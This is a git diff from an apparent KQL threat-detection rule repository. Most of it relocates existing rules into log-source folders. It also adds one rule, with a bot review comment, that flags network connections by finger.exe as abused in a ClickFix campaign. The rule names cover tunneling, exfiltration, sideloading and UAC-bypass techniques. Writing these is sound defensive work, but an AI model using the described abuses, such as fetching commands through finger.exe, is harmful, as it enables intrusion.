a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql 
diff --git a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql rename to KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql similarity index 100% rename from KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql rename to KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql diff --git a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql rename to KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql 
diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql rename to KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql diff --git a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql similarity index 100% rename from KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql rename to KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql rename to KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql rename to KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql diff --git a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql b/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql similarity index 100% rename from KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql rename to KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql 
diff --git a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql rename to KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql diff --git a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql b/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql rename to KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql b/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql similarity index 100% rename from KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql rename to KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql similarity index 100% rename from KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql rename to KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql rename to KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql 
diff --git a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql b/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql similarity index 100% rename from KQL/rules/Persistence/uac_bypass_with_fake_dll.kql rename to KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql diff --git a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql similarity index 100% rename from KQL/rules/Execution/vba_dll_loaded_via_office_application.kql rename to KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql diff --git a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql similarity index 100% rename from KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql rename to KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql rename to KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql diff --git a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql similarity index 100% rename from KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql rename to KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql 
diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql similarity index 100% rename from KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql rename to KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql similarity index 100% rename from KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql rename to KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql similarity index 100% rename from KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql rename to KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql diff --git a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql b/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql similarity index 100% rename from KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql rename to KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql similarity index 100% rename from KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql rename to KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql 
diff --git a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql similarity index 100% rename from KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql rename to KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql similarity index 100% rename from KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql rename to KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql similarity index 100% rename from KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql rename to KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql diff --git a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql b/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql similarity index 100% rename from KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql rename to KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql 
diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql diff --git a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql similarity index 100% rename from KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql diff --git a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql similarity index 100% rename from KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql diff --git a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql similarity index 100% rename from KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql 
diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql similarity index 100% rename from KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql similarity index 100% rename from KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql similarity index 100% rename from KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql similarity index 100% rename from KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql 
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql
similarity index 100%
rename from KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql
rename to KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql
similarity index 100%
rename from KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
rename to KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
similarity index 100%
rename from KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
rename to KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql
new file mode 100644
index 00000000..4f4f0ae3
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql
@@ -0,0 +1,15 @@
+// Title: Network Connection Initiated via Finger.EXE
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-19
+// Level: high
+// Description: Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
+// In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
+// Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
+// Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.004, attack.execution, attack.t1059.003
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\finger.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql
rename to KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql
diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
similarity index 100%
rename from KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
rename to KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
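Review bot: The query at the end of the hunk returns every DeviceNetworkEvents row whose initiating image ends in `\finger.exe`, so inbound and listening events are matched alongside the outbound connections the title and description refer to; adding `| where ActionType !in ("InboundConnectionAccepted", "ListeningConnectionCreated")` after the path filter would keep the rule to connections the process itself initiated. The result also has no projection, so an analyst triaging a hit must return to the raw row for the remote endpoint and command line the description says are worth investigating; `| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteIP, RemotePort, RemoteUrl` would surface them directly. Minor: the fourth Description line has no terminal period, and the file is committed without a trailing newline.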
diff --git a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql similarity index 100% rename from KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql rename to KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql similarity index 100% rename from KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql rename to KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql similarity index 100% rename from KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql 
diff --git a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql similarity index 100% rename from KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql similarity index 100% rename from KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql similarity index 100% rename from KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql rename to KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql rename to KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql 
diff --git a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql similarity index 100% rename from KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql rename to KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql rename to KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql similarity index 100% rename from KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql rename to KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql diff --git a/KQL/rules/Discovery/python_initiated_connection.kql b/KQL/rules/windows/network_connection/python_initiated_connection.kql similarity index 100% rename from KQL/rules/Discovery/python_initiated_connection.kql rename to KQL/rules/windows/network_connection/python_initiated_connection.kql diff --git a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql similarity index 100% rename from KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql rename to KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql 
diff --git a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql b/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql similarity index 100% rename from KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql rename to KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql diff --git a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql similarity index 100% rename from KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql rename to KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql similarity index 100% rename from KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql rename to KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql diff --git a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql b/KQL/rules/windows/network_connection/rundll32_internet_connection.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_internet_connection.kql rename to KQL/rules/windows/network_connection/rundll32_internet_connection.kql diff --git a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql similarity index 100% rename from KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql rename to KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql 
diff --git a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql b/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql rename to KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql diff --git a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql rename to KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql diff --git a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql rename to KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql rename to KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql 
diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql rename to KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql rename to KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql rename to KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql similarity index 100% rename from KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql rename to KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql similarity index 100% rename from KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql rename to KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql 
diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql rename to KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql diff --git a/KQL/rules/Collection/7zip_compressing_dump_files.kql b/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql similarity index 100% rename from KQL/rules/Collection/7zip_compressing_dump_files.kql rename to KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql diff --git a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql similarity index 100% rename from KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql rename to KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql diff --git a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql similarity index 100% rename from KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql rename to KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql diff --git a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql similarity index 100% rename from KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql rename to KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql 
diff --git a/KQL/rules/Defense Evasion/abusing_print_executable.kql b/KQL/rules/windows/process_creation/abusing_print_executable.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/abusing_print_executable.kql
rename to KQL/rules/windows/process_creation/abusing_print_executable.kql
diff --git a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql
similarity index 100%
rename from KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql
rename to KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql
diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql
similarity index 100%
rename from KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql
rename to KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql
diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql
similarity index 100%
rename from KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql
rename to KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql
diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
rename to KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql
diff --git a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql
rename to KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql
diff --git a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql
rename to KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql
diff --git a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql
rename to KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql
diff --git a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql
similarity index 100%
rename from KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql
rename to KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql
diff --git a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql
